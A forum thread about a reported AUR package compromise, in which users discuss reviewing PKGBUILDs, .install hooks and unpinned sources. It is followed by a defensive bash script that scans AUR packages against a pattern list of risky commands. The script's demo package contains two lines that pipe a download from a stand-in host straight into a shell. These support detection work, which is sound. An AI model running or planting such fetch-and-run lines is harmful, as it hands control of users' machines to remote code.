this post was submitted on 16 Jun 2026
libre


Nearly 2000 packages affected now.

I'm starting to become sceptical of package managers as a concept.

[–] TankieTanuki@hexbear.net 13 points 2 weeks ago (3 children)

I always review the PKGBUILD file before building something from the AUR. I just make sure the source URL looks sane. What else should I be looking out for?

[–] edie@lemmy.encryptionin.space 7 points 2 weeks ago* (last edited 2 weeks ago)

What it does/commands it runs (e.g. in the package() and such functions, the .install files too). If they pull in external scripts, especially from the internet. What said scripts do.


This user is suspected of being a cat. Please report any suspicious behavior.

[–] chgxvjh@hexbear.net 6 points 2 weeks ago* (last edited 2 weeks ago) (1 children)

Specific git revision is a risk because GitHub will give you commits from forks.

Just tracking branches is kinda normal on AUR but is also not ideal since it exposes you to upstream getting screwed more directly.

Honestly my biggest disappointment with archlinux is that they haven't written up something about the attack vectors that were actually used. Seems really important when you are betting on individual responsibility so hard. It's also the norm to write an incident report after a fuckup even 0.1% of that size.

[–] TankieTanuki@hexbear.net 3 points 2 weeks ago* (last edited 2 weeks ago) (1 children)

I just do git clone "https://aur.archlinux.org/${AUR_pkg_name}.git". Is that bad?

[–] chgxvjh@hexbear.net 3 points 2 weeks ago

I'm talking about the srcs used in the PKGBUILDs

[–] super_mario_420@hexbear.net 3 points 2 weeks ago (1 children)

Which AUR helper are you using? I've been using yay for years, but now I'm thinking it makes it too easy to just mash Y and skip all diffs etc. when updating. I'd like one that forces you to check the PKGBUILD before installing something...

[–] TankieTanuki@hexbear.net 2 points 2 weeks ago (1 children)
[–] super_mario_420@hexbear.net 2 points 2 weeks ago (1 children)
[–] TankieTanuki@hexbear.net 1 points 2 weeks ago

It's more likely than you think!
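A worked version of the review routine discussed in this thread, pulling together edie's checklist (what package() and the .install hooks actually run, whether they fetch scripts from the internet), chgxvjh's point about pinned commits versus tracked branches in the PKGBUILD sources, and super_mario_420's wish for a helper that refuses to build until you have looked. This is an added example written for this page; it is not code from anyone in the thread, from the Arch project, or from any AUR helper. All function names, the verdict wording and the list of "risky" command patterns are this example's own choices, the pattern list is a heuristic rather than an Arch rule, and the demo PKGBUILD and .install file it reviews are constructed (the "example" and ".invalid" names resolve nowhere). Everything except the review_aur_pkg entry point works on a local checkout with no network.

```shell
#!/usr/bin/env bash
# Static pre-makepkg review of an AUR package, following the checklist in this thread.
# Constructed example, not an Arch/AUR tool. The PKGBUILD is never sourced, so a
# hostile one cannot run while you are still deciding whether to build it.

# Print a PKGBUILD array (source, sha256sums, ...) one entry per line, quotes
# stripped, URL fragments such as #commit= kept. Plain single- or multi-line
# arrays only; source_x86_64=() and friends still need reading by hand.
pkgbuild_array() {   # usage: pkgbuild_array NAME FILE
    awk -v name="$1" '
        !inarr && index($0, name "=(") == 1 { inarr = 1; $0 = substr($0, length(name) + 3) }
        inarr {
            line = $0; done = (line ~ /\)/)
            sub(/\).*$/, "", line)             # closing paren and anything after it
            sub(/[[:space:]]#.*$/, "", line)   # trailing comment, not a .git#commit= fragment
            gsub(/["'\'']/, "", line)
            n = split(line, parts, /[[:space:]]+/)
            for (i = 1; i <= n; i++) if (parts[i] != "") print parts[i]
            if (done) inarr = 0
        }' "$2"
}

# One-word verdict plus a reason for a single source entry.
classify_source() {
    local src="${1#*::}"    # drop a "localname::" prefix
    case "$src" in
        git+*|*.git|*.git#*) case "$src" in
            *'#commit='*) echo "pinned   commit hash; confirm it is on an upstream branch (GitHub serves fork commits under the upstream URL too)" ;;
            *'#tag='*)    echo "tag      tags can be moved upstream; compare with the release" ;;
            *)            echo "unpinned tracks a branch: you get whatever upstream pushes next" ;;
            esac ;;
        http://*|ftp://*) echo "insecure plaintext download, tamperable in transit" ;;
        https://*)        echo "archive  remote file: its checksum must not be SKIP" ;;
        *)                echo "local    file shipped in the AUR repo itself: read it" ;;
    esac
}

# Count SKIP checksums. SKIP on a VCS source is normal (the commit or tag is the
# pin); SKIP on a tarball or a local script means nothing verifies it at all.
skipped_checksums() {
    local algo n=0
    for algo in md5sums sha1sums sha256sums sha512sums b2sums; do
        n=$((n + $(pkgbuild_array "$algo" "$1" | grep -c '^SKIP$' || true)))
    done
    echo "$n"
}

# Lines to read closely in the PKGBUILD and any .install hooks: network fetches at
# build time, downloads piped into a shell, eval/base64 obfuscation, setuid bits,
# sudo, writes into the user's home rather than $pkgdir. A heuristic, not a rule.
RISKY='curl |wget |pip install|npm install|(^|[^[:alnum:]_])eval |base64 (-d|--decode)|sudo |\| *(ba)?sh( |$)|\$HOME|~/|chmod [ugoa]*\+s'
scan_commands() { grep -nHE "$RISKY" "$@" || true; }
review_dir() {   # all static checks over a checked-out AUR repo directory
    local dir="$1" f s
    set -- "$dir/PKGBUILD"
    for f in "$dir"/*.install; do [ -e "$f" ] && set -- "$@" "$f"; done
    echo "== sources"
    pkgbuild_array source "$dir/PKGBUILD" | while IFS= read -r s; do
        printf '  %s\n      %s\n' "$s" "$(classify_source "$s")"
    done
    echo "== SKIPped checksums: $(skipped_checksums "$dir/PKGBUILD")"
    echo "== lines to read closely"; scan_commands "$@" | sed 's/^/  /'
}

# Interactive entry point: clone, review, page through the files, and require a
# typed "yes" before makepkg runs, the forced pause asked for in the thread.
review_aur_pkg() {
    local pkg="$1" f ans
    git clone "https://aur.archlinux.org/${pkg}.git" || return 1
    echo "== recent AUR commits (new maintainer? unexplained rewrite?)"
    git -C "$pkg" log --format='%ad %an  %s' --date=short -n 5
    review_dir "$pkg"
    for f in "$pkg"/PKGBUILD "$pkg"/*.install; do [ -e "$f" ] && "${PAGER:-less}" "$f"; done
    printf 'Build %s? type yes to continue: ' "$pkg"; read -r ans
    if [ "$ans" = yes ]; then (cd "$pkg" && makepkg -si); else echo "skipped"; fi
}
# Constructed AUR checkout for the stand-alone demo; "example" and ".invalid" are
# reserved names that resolve nowhere.
write_demo_repo() {
    cat > "$1/PKGBUILD" <<'EOF'
pkgname=demo-tool
pkgver=1.2.0
source=(
    "$pkgname-$pkgver.tar.gz::https://github.com/example/demo-tool/archive/v$pkgver.tar.gz"
    'git+https://github.com/example/demo-plugin.git'   # tracks the default branch
    'helper.sh'
)
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000' 'SKIP' 'SKIP')
package() {
    cd "$pkgname-$pkgver"
    curl -fsSL https://updates.example.invalid/postinstall.sh | bash
    install -Dm755 demo-tool "$pkgdir/usr/bin/demo-tool"
}
EOF
    printf 'post_install() {\n    curl -fsSL https://updates.example.invalid/hook.sh | sh\n}\n' > "$1/demo-tool.install"
}
if [ "$#" -gt 0 ]; then review_aur_pkg "$1"
else demo=$(mktemp -d); write_demo_repo "$demo"; review_dir "$demo"; rm -r "$demo"; fi
```

Run with no arguments it prints the review of the constructed package: one archive source whose checksum is real, one git source tracking a branch, one local helper.sh with a SKIP checksum, and the two curl-into-shell lines (one in package(), one in the post_install hook). Run as review-aur.sh somepkg it clones from aur.archlinux.org, shows the last few commits to the AUR repo so a maintainer change stands out, pages through the files, and only calls makepkg -si after a typed yes. The "pinned" verdict carries the caveat from this thread: a #commit= hash under an upstream GitHub URL is only as good as your check that the commit is reachable from one of upstream's own branches.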